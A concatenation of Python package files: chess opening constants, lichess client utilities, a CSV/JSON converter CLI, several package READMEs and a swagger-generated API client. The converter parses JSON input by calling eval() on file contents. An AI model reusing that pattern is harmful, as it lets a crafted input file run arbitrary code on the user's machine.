SCANDINAVIAN_DEFENCE__MODERN_VARIATION = 'rnbqkb1r/ppp1pppp/5n2/3P4/3P4/8/PPP2PPP/RNBQKBNR b KQkq - 0 3' # noqa: E501
SCOTCH_GAME = 'r1bqkbnr/pppp1ppp/2n5/4p3/3PP3/5N2/PPP2PPP/RNBQKB1R b KQkq d3 1 3' # noqa: E501
SCOTCH_GAME__CLASSICAL_VARIATION = 'r1bqk1nr/pppp1ppp/2n5/2b5/3NP3/8/PPP2PPP/RNBQKB1R w KQkq - 2 5' # noqa: E501
SCOTCH_GAME__MIESES_VARIATION = 'r1bqkb1r/p1pp1ppp/2p2n2/4P3/8/8/PPP2PPP/RNBQKB1R b KQkq - 1 6' # noqa: E501
SCOTCH_GAME__STEINITZ_VARIATION = 'r1b1kbnr/pppp1ppp/2n5/8/3NP2q/8/PPP2PPP/RNBQKB1R w KQkq - 2 5' # noqa: E501
SICILIAN_DEFENCE = 'rnbqkbnr/pp1ppppp/8/2p5/4P3/8/PPPP1PPP/RNBQKBNR w KQkq c6 1 2' # noqa: E501
SICILIAN_DEFENCE__ACCELERATED_DRAGON = 'r1bqkbnr/pp1ppp1p/2n3p1/8/3NP3/8/PPP2PPP/RNBQKB1R w KQkq - 1 5' # noqa: E501
SICILIAN_DEFENCE__ALAPIN_VARIATION = 'rnbqkbnr/pp1ppppp/8/2p5/4P3/2P5/PP1P1PPP/RNBQKBNR b KQkq - 1 2' # noqa: E501
SICILIAN_DEFENCE__CLOSED_VARIATION = 'rnbqkbnr/pp1ppppp/8/2p5/4P3/2N5/PPPP1PPP/R1BQKBNR b KQkq - 2 2' # noqa: E501
SICILIAN_DEFENCE__DRAGON_VARIATION = 'rnbqkb1r/pp2pp1p/3p1np1/8/3NP3/2N5/PPP2PPP/R1BQKB1R w KQkq - 1 6' # noqa: E501
SICILIAN_DEFENCE__GRAND_PRIX_ATTACK = 'r1bqkbnr/pp1ppppp/2n5/2p5/4PP2/2N5/PPPP2PP/R1BQKBNR b KQkq f3 1 3' # noqa: E501
SICILIAN_DEFENCE__HYPER_ACCELERATED_DRAGON = 'rnbqkbnr/pp1ppp1p/6p1/2p5/4P3/5N2/PPPP1PPP/RNBQKB1R w KQkq - 1 2' # noqa: E501
SICILIAN_DEFENCE__KAN_VARIATION = 'rnbqkbnr/1p1p1ppp/p3p3/8/3NP3/8/PPP2PPP/RNBQKB1R w KQkq - 1 5' # noqa: E501
SICILIAN_DEFENCE__NAJDORF_VARIATION = 'rnbqkb1r/1p2pppp/p2p1n2/8/3NP3/2N5/PPP2PPP/R1BQKB1R w KQkq - 1 6' # noqa: E501
SICILIAN_DEFENCE__RICHTER_RAUZER_VARIATION = 'r1bqkb1r/pp2pppp/2np1n2/6B1/3NP3/2N5/PPP2PPP/R2QKB1R b KQkq - 5 6' # noqa: E501
SICILIAN_DEFENCE__SCHEVENINGEN_VARIATION = 'rnbqkb1r/pp3ppp/3ppn2/8/3NP3/2N5/PPP2PPP/R1BQKB1R w KQkq - 1 6' # noqa: E501
SICILIAN_DEFENCE__SMITH_MORRA_GAMBIT = 'rnbqkbnr/pp1ppppp/8/8/3pP3/2P5/PP3PPP/RNBQKBNR b KQkq - 1 3' # noqa: E501
SOKOLSKY_OPENING = 'rnbqkbnr/pppppppp/8/8/1P6/8/P1PPPPPP/RNBQKBNR b KQkq - 1 1' # noqa: E501
TORRE_ATTACK = 'rnbqkb1r/ppp1pppp/5n2/3p2B1/3P4/5N2/PPP1PPPP/RN1QKB1R b KQkq - 4 3' # noqa: E501
TROMPOWSKY_ATTACK = 'rnbqkb1r/pppppppp/5n2/6B1/3P4/8/PPP1PPPP/RN1QKBNR b KQkq - 3 2' # noqa: E501
VIENNA_GAME = 'rnbqkbnr/pppp1ppp/8/4p3/4P3/2N5/PPPP1PPP/R1BQKBNR b KQkq - 2 2' # noqa: E501
ZUKERTORT_OPENING = 'rnbqkbnr/pppppppp/8/8/8/5N2/PPPPPPPP/RNBQKB1R b KQkq - 1 1' # noqa: E501 | zack-berserk | /zack-berserk-0.11.1.tar.gz/zack-berserk-0.11.1/berserk/enums.py | enums.py |
from datetime import datetime
from datetime import timezone
import collections
def to_millis(dt):
"""Return the milliseconds between the given datetime and the epoch.
:param datetime dt: a datetime
:return: milliseconds since the epoch
:rtype: int
"""
return dt.timestamp() * 1000
def datetime_from_seconds(ts):
"""Return the datetime for the given seconds since the epoch.
UTC is assumed. The returned datetime is timezone aware.
:return: timezone aware datetime
:rtype: :class:`datetime`
"""
return datetime.fromtimestamp(ts, timezone.utc)
def datetime_from_millis(millis):
"""Return the datetime for the given millis since the epoch.
UTC is assumed. The returned datetime is timezone aware.
:return: timezone aware datetime
:rtype: :class:`datetime`
"""
return datetime_from_seconds(millis / 1000)
def datetime_from_str(dt_str):
"""Convert the time in a string to a datetime.
UTC is assumed. The returned datetime is timezone aware. The format
must match ``%Y-%m-%dT%H:%M:%S.%fZ``.
:return: timezone aware datetime
:rtype: :class:`datetime`
"""
dt = datetime.strptime(dt_str, '%Y-%m-%dT%H:%M:%S.%fZ')
return dt.replace(tzinfo=timezone.utc)
_RatingHistoryEntry = collections.namedtuple('Entry', 'year month day rating')
def rating_history(data):
return _RatingHistoryEntry(*data)
def inner(func, *keys):
def convert(data):
for k in keys:
try:
data[k] = func(data[k])
except KeyError:
pass # normal for keys to not be present sometimes
return data
return convert
def listing(func):
def convert(items):
result = []
for item in items:
result.append(func(item))
return result
return convert
def noop(arg):
return arg
def build_adapter(mapper, sep='.'):
"""Build a data adapter.
Uses a map to pull values from an object and assign them to keys.
For example:
.. code-block:: python
>>> mapping = {
... 'broadcast_id': 'broadcast.id',
... 'slug': 'broadcast.slug',
... 'name': 'broadcast.name',
... 'description': 'broadcast.description',
... 'syncUrl': 'broadcast.sync.url',
... }
>>> cast = {'broadcast': {'id': 'WxOb8OUT',
... 'slug': 'test-tourney',
... 'name': 'Test Tourney',
... 'description': 'Just a test',
... 'ownerId': 'rhgrant10',
... 'sync': {'ongoing': False, 'log': [], 'url': None}},
... 'url': 'https://lichess.org/broadcast/test-tourney/WxOb8OUT'}
>>> adapt = build_adapter(mapping)
>>> adapt(cast)
{'broadcast_id': 'WxOb8OUT',
'slug': 'test-tourney',
'name': 'Test Tourney',
'description': 'Just a test',
'syncUrl': None}
:param dict mapper: map of keys to their location in an object
:param str sep: nested key delimiter
:return: adapted data
:rtype: dict
"""
def get(data, location):
for key in location.split(sep):
data = data[key]
return data
def adapter(data, default=None, fill=False):
result = {}
for key, loc in mapper.items():
try:
result[key] = get(data, loc)
except KeyError:
if fill:
result[key] = default
return result
return adapter | zack-berserk | /zack-berserk-0.11.1.tar.gz/zack-berserk-0.11.1/berserk/utils.py | utils.py |
import logging # print gurmetizado
from pathlib import Path
import click
logging.basicConfig(
level="DEBUG", format="'%(asctime)s - %(name)s - %(levelname)s - %(message)s'"
)
logger = logging.getLogger(__name__)
@click.command() ## comandos no terminal
# tipo de arquivo
@click.option(
"--type",
"-t",
prompt=True,
prompt_required=False,
default="file",
help=("Tipo do arquivo a ser convertido CSV ou JSON"),
type = str
)
# caminho de leitura do arquivo
@click.option(
"--input",
"-i",
default="./",
help="Caminho onde encontrar os arquivos a serem convertidos.",
type= str,
)
# caminho de saida do arquivo
@click.option(
"--output",
"-o",
default="./",
help="Caminho onde os arquivos convertidos serão salvos.",
type=str,
)
# delimitador do arquivo
@click.option(
"--delimiter",
"-d",
default=",",
help="Separador usado para dividir os arquivos.",
type=str,
)
# prefix
@click.option(
"--prefix",
"-p",
prompt=True,
prompt_required=False,
default="file",
help=(
"Prefixo usado para preceder o nome do arquivo convertido salvo no disco."
"O sufixo será um número começando em 0. ge: file_0.json."
),
)
def converter(type: str = "csv", input: str = "./", output: str = "./", delimiter: str = ",", prefix: str = None):
type_file = type.lower()
input_path = Path(input)
output_path = Path(output)
logger.info("Input Path: %s", input_path)
logger.info("Output Path: %s", output_path)
for p in [input_path, output_path]:
if p.is_file() or p.is_dir():
print(f"é um arquivo ou diretorio {p}")
else:
raise TypeError("Arquivo ou diretorio não é valido")
if type_file == 'csv':
data = read_csv(source=input_path, delimiter=delimiter) # leitura de arquivo(s) csv
write_json_data(csvs=data, output_path= output_path, prefix=prefix) # sava como json o(s) arquivo(s)
elif type_file == 'json':
data = read_json(source=input_path) # leitura de arquivo(s) json
write_csv_data(jsons=data, output_path= output_path, delimiter= delimiter, prefix=prefix) # sava como csv o(s) arquivo(s)
else:
raise TypeError("Formato de arquivo não permitido")
# lendo 1 ou diretorio contendo arquivos CSV
def read_csv(source: Path, delimiter: str = ","):
"""Carregue os arquivos csv do disco.
Args:
source (Path): Caminho de um único arquivo csv ou um diretório contendo arquivos csv.
delimitador (str): Separador para colunas em csv.
Retornar:
tupla: lista de discionarios.
"""
parsed_data = list()
if source.is_file():
logger.info("Realiza a leitura de unico arquivo %s", source)
with source.open(mode="r", encoding="utf-8-sig") as file:
lines = file.readlines()
data = [line.strip().split(delimiter) for line in lines]
result = parse_csv_to_json(data)
parsed_data.append(result)
return parsed_data
logger.info("Realiza a leitura de todos os arquivos do diretorio %s", source)
for i in source.iterdir():
with i.open(mode="r", encoding="utf-8-sig") as file:
lines = file.readlines()
data = [line.strip().split(delimiter) for line in lines]
result = parse_csv_to_json(data)
parsed_data.append(result)
return parsed_data
# realiza a conversão de lista para dict
def parse_csv_to_json(data):
"""Converte a lista de dados de CSV para formato Json"""
column = data[0]
lines = data[1:]
result = [dict(zip(column, line)) for line in lines]
return result
# escreve em formato de JSON
def write_json_data(csvs, output_path: Path, prefix: str = None):
"""Salvar em arquivo json no disco.
Args:
csvs (dcionarios): Dicionarios que seram jogados em um arquivo Json
output_path (Path): Caminho onde salvar os arquivos json
prefix (str): Nome dos arquivos. Se nada for dado, vai como file_
"""
i = 0
while i < len(csvs):
data = csvs[i]
file_name = f"{prefix}_{i+1}.json"
output = output_path.joinpath(file_name)
logger.info("Savando o arquivo como: %s", output)
#__import__("IPython").embed()
with output.open("w") as file:
file.write("[\n")
for d in data[:-1]:
write_dictionary(d, file, append_comma=True)
write_dictionary(data[-1], file, append_comma=False)
file.write("]\n")
i +=1
def write_line(line: tuple, io, append_comma: bool):
key, value = line
if not value:
value = 'null';
elif is_int(value):
value = int(value)
elif is_float(value):
value = float(value)
else:
value = f'"{value}"'
if append_comma:
io.write(f'\t\t "{key}": {value}, \n')
else:
io.write(f'\t\t "{key}": {value} \n')
def write_dictionary(data: dict, io, append_comma: True):
io.write("\t{\n")
items = tuple(data.items())
for line in items[:-1]:
write_line(line, io, append_comma=True)
write_line(items[-1], io, append_comma=False)
io.write("\t")
if append_comma:
io.write("},\n")
else:
io.write("}\n")
# lendo 1 ou diretorio contendo arquivos JSON
def read_json(source: Path):
"""Carregue os arquivos Json do disco.
Args:
source (Path): Caminho de um único arquivo json ou um diretório contendo arquivos json.
Retornar:
lista: lista de dicionarios.
"""
result = list()
if source.is_file():
logger.info("Realiza a leitura de um unico arquivo %s", source)
result.append(eval(open(source, "r").read().replace("null", "None")))
return result
logger.info("Realiza a leitura de todos os arquivos do diretorio %s", source)
for i in source.iterdir():
##__import__("IPython").embed()
result.append(list(eval(open(i, "r").read().replace("null", "None"))))
return result
# escreve em formato CSV
def write_csv_data(jsons: list, delimiter: str, output_path: Path, prefix: str = None):
"""Salva em arquivo csv no disco .
Args:
jsons (list): Lista de dicionarios que serão inseridos no(s) arquivo(s) csv.
delimiter (str): Caracter separador que será utilizado nas colunas do(s) arquivo(s) csv.
output_path (Path): Caminho onde salvar o(s) arquivo(s) csv.
prefix (str): Nome do(s) arquivo(s) csv que será salvo em disco.
"""
j = 0
while j < len(jsons):
json = jsons[j]
data = list()
file_name = f"{prefix}_{j+1}.csv"
output = output_path.joinpath(file_name)
logger.info("Savando o arquivo como: %s", output)
data.append(list(json[0].keys()))
for k, v in enumerate(json):
data.append(list(v.values()))
#__import__("IPython").embed()
with output.open('w') as file:
for sublist in data:
for i, item in enumerate(sublist):
if item == None:
item = ""
else:
item = str(item)
if i == len(sublist)-1:
file.write(item)
else:
file.write(item + delimiter)
file.write('\n')
j+=1
# validar float
def is_float(value: str):
"""Verifica se o valor é float
Args:
value (str): recebe string.
Returns:
bool: retorna um valor boleano se a strig pode ser convertida em float.
"""
try:
a = float(value)
except (TypeError, ValueError):
return False
else:
return True
# valida inteiro
def is_int(value: str):
"""Verifica se o valor é inteiro
Args:
value (str): recebe string.
Returns:
bool: retorna um valor boleano se a strig pode ser convertida em inteiro.
"""
try:
a = float(value)
b = int(a)
except (TypeError, ValueError):
return False
else:
return a == b | zack-puc-ia-csv-converter | /zack_puc_ia_csv_converter-0.1.9-py3-none-any.whl/zack_puc_ia_csv_converter/converter.py | converter.py |
# zackdbtool
a python package to connect db and data sources like google sheets
## Set up
make a json file that contains the database credentials.
see example: dbcredentials_example.json (memory and filedb are for sqlite quick usage, you can add more like test1)
```
{
"test1":{
"conn_engine":"mysql+pymysql",
"host":"192.168.0.12",
"port":3306,
"user":"test_user",
"passwd":"********",
"db":"public",
"testtable":"user"
},
"memory":{
"conn_engine":"sqlite",
"host":"/:memory:",
"port":"",
"user":"",
"passwd":"",
"db":"test",
"testtable":""
},
"filedb":{
"conn_engine":"sqlite",
"host":"/filedb.db",
"port":"",
"user":"",
"passwd":"",
"db":"test",
"testtable":""
}
}
```
save the file to a location, e.g. $HOME/.credentials/dbcredentials_example.json
save your google service account json file to a location e.g. $HOME/.credentials/service_account.json
add two environment variable for those two files:
```
DB_CREDENTIALS_PATH=$HOME/.credentials/dbcredentials_example.json
SERVICE_ACCOUNT_JSON_PATH=$HOME/.credentials/service_account.json
```
in linux/mac you can (NOTE: in vscode jupyter, it doesn't read the .bashrc, you can either add a .env or use the same file path below)
```
vi $HOME/.bashrc
```
inseart two rows to the end of the file and restart the terminal
```
export DB_CREDENTIALS_PATH=$HOME/.credentials/dbcredentials_example.json
export SERVICE_ACCOUNT_JSON_PATH=$HOME/.credentials/service_account.json
```
if you run your app as a systemd service:
```
vi /etc/systemd/system/YOURSERVICENAME.service
```
add environment variable
```
[Service]
Environment=DB_CREDENTIALS_PATH=$HOME/.credentials/dbcredentials.json
Environment=SERVICE_ACCOUNT_JSON_PATH=$HOME/.credentials/ga-service-account.json
```
then reload daemon
```
systemctl daemon-reload
```
in windows, use the search bar to search "environment variable" add the two variables to user/system variables
if you want to build app in docker
```
docker run -e DB_CREDENTIALS_PATH=dbcredentials.json -e SERVICE_ACCOUNT_JSON_PATH=ga-service-account.json dockerimagename
```
download the repository, and
```
pip install .
```
or through pipy
```
pip install zackdbtool
```
## Connect a database
```
from zackdbtool import db_engine
import pandas as pd
dbsource= 'mydb'
engine = db_engine(dbsource, db='test')
df = pd.read_sql(f'SELECT * FROM user limit 10', engine)
print(df)
```
if you don't have a database running you can use memory or filedb to create a testing database without any setup
```
from zackdbtool import db_engine
import pandas as pd
from sqlalchemy.orm import declarative_base
from sqlalchemy import Column, Integer, String
from sqlalchemy.orm import sessionmaker
dbsource= 'memory'
engine = db_engine(dbsource)
Base = declarative_base()
sesson = sessionmaker(bind=engine)
class User(Base):
__tablename__ = "users"
id = Column(Integer, primary_key=True)
name = Column(String)
fullname = Column(String)
Base.metadata.create_all(engine)
ed_user = User(name="ed", fullname="Ed Jones")
session.add(ed_user)
session.commit()
with engine.connect() as c:
data = c.execute('select * from users').fetch_all()
print(data)
```
## use google services
```
view_id = 'your site view id'
metrics = ['ga:users','ga:newUsers','ga:pageViews','ga:sessions']
# find more setting at https://ga-dev-tools.web.app/query-explorer/
dimensions = ['ga:month', 'ga:year']
start_date = '2000-01-01'
df = gareports(view_id, metrics, dimensions, start_date=start_date)
```
# google sheet
```
SAMPLE_SPREADSHEET_ID_PV = 'your google sheet id'
SAMPLE_RANGE_NAME_PV = 'your sheet name'
dedupCol = 'idcolname'
skiprows = 0
dfpv = readgooglesheets(SAMPLE_SPREADSHEET_ID_PV, SAMPLE_RANGE_NAME_PV,dedupCol = dedupCol, skiprows = skiprows)
print(dfpv.head())
``` | zackdbtools | /zackdbtools-0.1.14.tar.gz/zackdbtools-0.1.14/README.md | README.md |
# zacks-earnings
Get earnings releases from zacks.com/earnings/earnings-reports by date
```python
>>> ZacksEarnings.earnings_by_date(parser.parse('Aug 12, 2017'))
Symbol Company Report Time Estimate Reported Surprise Current Price Price % Change Unnamed: 8
0 ABCP AmBase Corp. 15:41 NaN -0.03 NaN 0.32 0.00 NaN
1 ADMA ADMA Biologics Inc 16:22 -0.42 -0.55 -30.95 2.12 2.42 NaN
2 AIKI AIkido Pharma Inc. 18:00 NaN -1.61 NaN 1.38 8.66 NaN
3 AIT Applied Industrial Technologies, Inc. 06:35 0.77 0.78 1.30 93.16 1.43 NaN
4 ARCT Arcturus Therapeutics Holdings Inc. 08:05 -0.91 -0.91 NaN 46.40 -4.01 NaN
.. ... ... ... ... ... ... ... ... ...
94 VLRXQ Valeritas Holdings, Inc. 08:01 -33.40 -36.60 -9.58 0.02 0.00 NaN
95 VRDN Viridian Therapeutics, Inc. 16:11 -7.05 -5.10 27.66 17.98 0.22 NaN
96 XAIR Beyond Air, Inc. 16:07 NaN -0.46 NaN 5.88 -2.33 NaN
97 XIN Xinyuan Real Estate Co Ltd 06:10 NaN 0.14 NaN 2.97 -0.67 NaN
98 ZNOG Zion Oil & Gas Inc 05:03 NaN -0.10 NaN 0.73 1.37 NaN
[99 rows x 9 columns]
```
Get the zacks estimated next earnings date for a symbol
```python
>>> ZacksEarnings.get_next_earnings_estimate('aapl')
[datetime.datetime(2021, 4, 29, 0, 0)]
```
| zacks-earnings | /zacks-earnings-0.0.1.tar.gz/zacks-earnings-0.0.1/README.md | README.md |
# zacktools
### Useful tools created by zackdai
# install
`pip install zacktools`
or from git
`pip3 install git+https://github.com/ZackAnalysis/zacktools.git`
## pageparser
A tool for parse address,phone, email, facebook, twitter, linkedin, contact link, about us link from a webpage
### usage
```
from zacktools import pageparser
import requests
res = requests.get('http://rel8ed.to')
result = pageparser.parse(res.content)
print(result)
```
```
{
"facebook": "https://www.facebook.com/rel8edto/",
"twitter": "https://twitter.com/rel8edto",
"instagram": "",
"linkedin": "https://www.linkedin.com/company/rel8ed-to",
"contactlink": "http://www.rel8ed.to/contact-us/",
"aboutlink": "http://www.rel8ed.to/about-us/",
"title": "Big Data Analysis Data Mining Predictive Analytics",
"email": "[email protected]",
"phone": "905.321.0466",
"Mainaddress": "1 St. Paul St., Unit A303, St. Catharines, ON L2R 7L2",
"addresses": [
"1 St. Paul St., Unit A303, St. Catharines, ON L2R 7L2"
]
}
```
### Test it [](https://colab.research.google.com/drive/1aE8PeQhJym8G6I_yHVfqIuydod5tlQuQ?usp=sharing)
## multithread
```
from zacktools.multiThread import scrapeurls
import asyncio
urls = ['ibm.com','idc.com']
asyncio.run(scrapeurls(urls))
```
| zacktools | /zacktools-0.3.8.tar.gz/zacktools-0.3.8/README.md | README.md |
.. toctree::
README
======
:zad: A GUI tool for maintaining DNS zones via dynamic update
:Copyright: Copyright (c) 2021 Axel Rau [email protected]
:License: `GPLv3 <http://www.gnu.org/licenses/>`_
:Homepage: https://codeberg.org/ajr/zad
:Documentation: https://zad.readthedocs.io
What
----
In times of DNSsec, edited zone files interfere with resigning activities of
the nameserver. To avoid inconsistency, zones can be maintained by dynamic update
(RFC 2136).
zad provides a GUI for dynamic updates and zone visualisation to make address
and host name editing easy and even easier than file editing.
ABOUT THIS RELEASE
------------------
* This is release candidate 2.
* All functionality, planned for 1.0 has been implemented
| zad | /zad-1.0rc2.tar.gz/zad-1.0rc2/README.rst | README.rst |
# zadarapyV2
## Requirements.
Python 2.7 and 3.4+
## Installation & Usage
### pip install
Clone the repo and run:
```sh
make generate_pythons
```
from zadarapyV2 folder, run:
```sh
pip install -r requirements.txt
pip install .
```
Or install from devpi
```sh
pip install zadarapyv2 --index-url <devpi url> --trusted-host <devpi host name>
```
Or install from pypi
```sh
pip install zadarapyv2
```
Then import the package:
```python
import Vpsa, CommandCenter, ProvisioningPortal ,Zios
```
## Getting Started
```python
import Vpsa as vpsa
import CommandCenter as cc
vpsa_conf = vpsa.configuration.Configuration()
cc_conf = cc.configuration.Configuration()
# Configure host ip + basePath
vpsa_conf.host='http://10.2.10.33/api'
cc_conf.host = 'https://10.16.1.50/api/v2'
# Configure API key authorization: api_key
vpsa_conf.api_key = {'X-Access-Key':'PPYW8KNXJA495-2'}
# create an instance of the API class
vpsa_api = vpsa.ApiClient(vpsa_conf)
# Use Users api
vpsa_users_api = vpsa.UsersApi(vpsa_api)
try:
api_response = vpsa_users_api.add_user(body_add_user=vpsa.BodyAddUser('john','[email protected]'))
pprint(api_response)
except ApiException as e:
print("Exception when calling add_user: %s\n" % e)
try:
users_list = vpsa_users_api.list_users().response.users
pprint(users_list)
except ApiException as e:
print("Exception when calling list_users: %s\n" % e)
```
| zadarapyV2 | /zadarapyV2-23.8.4.tar.gz/zadarapyV2-23.8.4/README.md | README.md |
from __future__ import absolute_import
import datetime
import json
import mimetypes
from multiprocessing.pool import ThreadPool
import os
import re
import tempfile
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import quote
from CommandCenter.configuration import Configuration
import CommandCenter.models
from CommandCenter import rest
class ApiClient(object):
"""Generic API client for Swagger client library builds.
Swagger generic API client. This client handles the client-
server communication, and is invariant across implementations. Specifics of
the methods and models for each application are generated from the Swagger
templates.
NOTE: This class is auto generated by the swagger code generator program.
Ref: https://github.com/swagger-api/swagger-codegen
Do not edit the class manually.
:param configuration: .Configuration object for this client
:param header_name: a header to pass when making calls to the API.
:param header_value: a header value to pass when making calls to
the API.
:param cookie: a cookie to include in the header when making calls
to the API
"""
PRIMITIVE_TYPES = (float, bool, bytes, six.text_type) + six.integer_types
NATIVE_TYPES_MAPPING = {
'int': int,
'long': int if six.PY3 else long, # noqa: F821
'float': float,
'str': str,
'bool': bool,
'date': datetime.date,
'datetime': datetime.datetime,
'object': object,
}
def __init__(self, configuration=None, header_name=None, header_value=None,
cookie=None):
if configuration is None:
configuration = Configuration()
self.configuration = configuration
# Use the pool property to lazily initialize the ThreadPool.
self._pool = None
self.rest_client = rest.RESTClientObject(configuration)
self.default_headers = {}
if header_name is not None:
self.default_headers[header_name] = header_value
self.cookie = cookie
# Set default User-Agent.
self.user_agent = 'Swagger-Codegen/1.0.0/python'
self.client_side_validation = configuration.client_side_validation
def __del__(self):
if self._pool is not None:
self._pool.close()
self._pool.join()
@property
def pool(self):
if self._pool is None:
self._pool = ThreadPool()
return self._pool
@property
def user_agent(self):
"""User agent for this API client"""
return self.default_headers['User-Agent']
@user_agent.setter
def user_agent(self, value):
self.default_headers['User-Agent'] = value
def set_default_header(self, header_name, header_value):
self.default_headers[header_name] = header_value
def __call_api(
self, resource_path, method, path_params=None,
query_params=None, header_params=None, body=None, post_params=None,
files=None, response_type=None, auth_settings=None,
_return_http_data_only=None, collection_formats=None,
_preload_content=True, _request_timeout=None):
config = self.configuration
# header parameters
header_params = header_params or {}
header_params.update(self.default_headers)
if self.cookie:
header_params['Cookie'] = self.cookie
if header_params:
header_params = self.sanitize_for_serialization(header_params)
header_params = dict(self.parameters_to_tuples(header_params,
collection_formats))
# path parameters
if path_params:
path_params = self.sanitize_for_serialization(path_params)
path_params = self.parameters_to_tuples(path_params,
collection_formats)
for k, v in path_params:
# specified safe chars, encode everything
resource_path = resource_path.replace(
'{%s}' % k,
quote(str(v), safe=config.safe_chars_for_path_param)
)
# query parameters
if query_params:
query_params = self.sanitize_for_serialization(query_params)
query_params = self.parameters_to_tuples(query_params,
collection_formats)
# post parameters
if post_params or files:
post_params = self.prepare_post_parameters(post_params, files)
post_params = self.sanitize_for_serialization(post_params)
post_params = self.parameters_to_tuples(post_params,
collection_formats)
# auth setting
self.update_params_for_auth(header_params, query_params, auth_settings)
# body
if body:
body = self.sanitize_for_serialization(body)
# request url
url = self.configuration.host + resource_path
# perform request and return response
response_data = self.request(
method, url, query_params=query_params, headers=header_params,
post_params=post_params, body=body,
_preload_content=_preload_content,
_request_timeout=_request_timeout)
self.last_response = response_data
return_data = response_data
if _preload_content:
# deserialize response data
if response_type:
return_data = self.deserialize(response_data, response_type)
else:
return_data = None
if _return_http_data_only:
return (return_data)
else:
return (return_data, response_data.status,
response_data.getheaders())
def sanitize_for_serialization(self, obj):
"""Builds a JSON POST object.
If obj is None, return None.
If obj is str, int, long, float, bool, return directly.
If obj is datetime.datetime, datetime.date
convert to string in iso8601 format.
If obj is list, sanitize each element in the list.
If obj is dict, return the dict.
If obj is swagger model, return the properties dict.
:param obj: The data to serialize.
:return: The serialized form of data.
"""
if obj is None:
return None
elif isinstance(obj, self.PRIMITIVE_TYPES):
return obj
elif isinstance(obj, list):
return [self.sanitize_for_serialization(sub_obj)
for sub_obj in obj]
elif isinstance(obj, tuple):
return tuple(self.sanitize_for_serialization(sub_obj)
for sub_obj in obj)
elif isinstance(obj, (datetime.datetime, datetime.date)):
return obj.isoformat()
if isinstance(obj, dict):
obj_dict = obj
else:
# Convert model obj to dict except
# attributes `swagger_types`, `attribute_map`
# and attributes which value is not None.
# Convert attribute name to json key in
# model definition for request.
obj_dict = {obj.attribute_map[attr]: getattr(obj, attr)
for attr, _ in six.iteritems(obj.swagger_types)
if getattr(obj, attr) is not None}
return {key: self.sanitize_for_serialization(val)
for key, val in six.iteritems(obj_dict)}
def deserialize(self, response, response_type):
"""Deserializes response into an object.
:param response: RESTResponse object to be deserialized.
:param response_type: class literal for
deserialized object, or string of class name.
:return: deserialized object.
"""
# handle file downloading
# save response body into a tmp file and return the instance
if response_type == "file":
return self.__deserialize_file(response)
# fetch data from response object
try:
data = json.loads(response.data)
except ValueError:
data = response.data
return self.__deserialize(data, response_type)
def __deserialize(self, data, klass):
"""Deserializes dict, list, str into an object.
:param data: dict, list or str.
:param klass: class literal, or string of class name.
:return: object.
"""
if data is None:
return None
if type(klass) == str:
if klass.startswith('list['):
sub_kls = re.match(r'list\[(.*)\]', klass).group(1)
return [self.__deserialize(sub_data, sub_kls)
for sub_data in data]
if klass.startswith('dict('):
sub_kls = re.match(r'dict\(([^,]*), (.*)\)', klass).group(2)
return {k: self.__deserialize(v, sub_kls)
for k, v in six.iteritems(data)}
# convert str to class
if klass in self.NATIVE_TYPES_MAPPING:
klass = self.NATIVE_TYPES_MAPPING[klass]
else:
klass = getattr(CommandCenter.models, klass)
if klass in self.PRIMITIVE_TYPES:
return self.__deserialize_primitive(data, klass)
elif klass == object:
return self.__deserialize_object(data)
elif klass == datetime.date:
return self.__deserialize_date(data)
elif klass == datetime.datetime:
return self.__deserialize_datatime(data)
else:
return self.__deserialize_model(data, klass)
def call_api(self, resource_path, method,
path_params=None, query_params=None, header_params=None,
body=None, post_params=None, files=None,
response_type=None, auth_settings=None, async_req=None,
_return_http_data_only=None, collection_formats=None,
_preload_content=True, _request_timeout=None):
"""Makes the HTTP request (synchronous) and returns deserialized data.
To make an async request, set the async_req parameter.
:param resource_path: Path to method endpoint.
:param method: Method to call.
:param path_params: Path parameters in the url.
:param query_params: Query parameters in the url.
:param header_params: Header parameters to be
placed in the request header.
:param body: Request body.
:param post_params dict: Request post form parameters,
for `application/x-www-form-urlencoded`, `multipart/form-data`.
:param auth_settings list: Auth Settings names for the request.
:param response: Response data type.
:param files dict: key -> filename, value -> filepath,
for `multipart/form-data`.
:param async_req bool: execute request asynchronously
:param _return_http_data_only: response data without head status code
and headers
:param collection_formats: dict of collection formats for path, query,
header, and post parameters.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return:
If async_req parameter is True,
the request will be called asynchronously.
The method will return the request thread.
If parameter async_req is False or missing,
then the method will return the response directly.
"""
if not async_req:
return self.__call_api(resource_path, method,
path_params, query_params, header_params,
body, post_params, files,
response_type, auth_settings,
_return_http_data_only, collection_formats,
_preload_content, _request_timeout)
else:
thread = self.pool.apply_async(self.__call_api, (resource_path,
method, path_params, query_params,
header_params, body,
post_params, files,
response_type, auth_settings,
_return_http_data_only,
collection_formats,
_preload_content, _request_timeout))
return thread
def request(self, method, url, query_params=None, headers=None,
post_params=None, body=None, _preload_content=True,
_request_timeout=None):
"""Makes the HTTP request using RESTClient."""
if method == "GET":
return self.rest_client.GET(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "HEAD":
return self.rest_client.HEAD(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "OPTIONS":
return self.rest_client.OPTIONS(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "POST":
return self.rest_client.POST(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PUT":
return self.rest_client.PUT(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PATCH":
return self.rest_client.PATCH(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "DELETE":
return self.rest_client.DELETE(url,
query_params=query_params,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
else:
raise ValueError(
"http method must be `GET`, `HEAD`, `OPTIONS`,"
" `POST`, `PATCH`, `PUT` or `DELETE`."
)
def parameters_to_tuples(self, params, collection_formats):
"""Get parameters as list of tuples, formatting collections.
:param params: Parameters as dict or list of two-tuples
:param dict collection_formats: Parameter collection formats
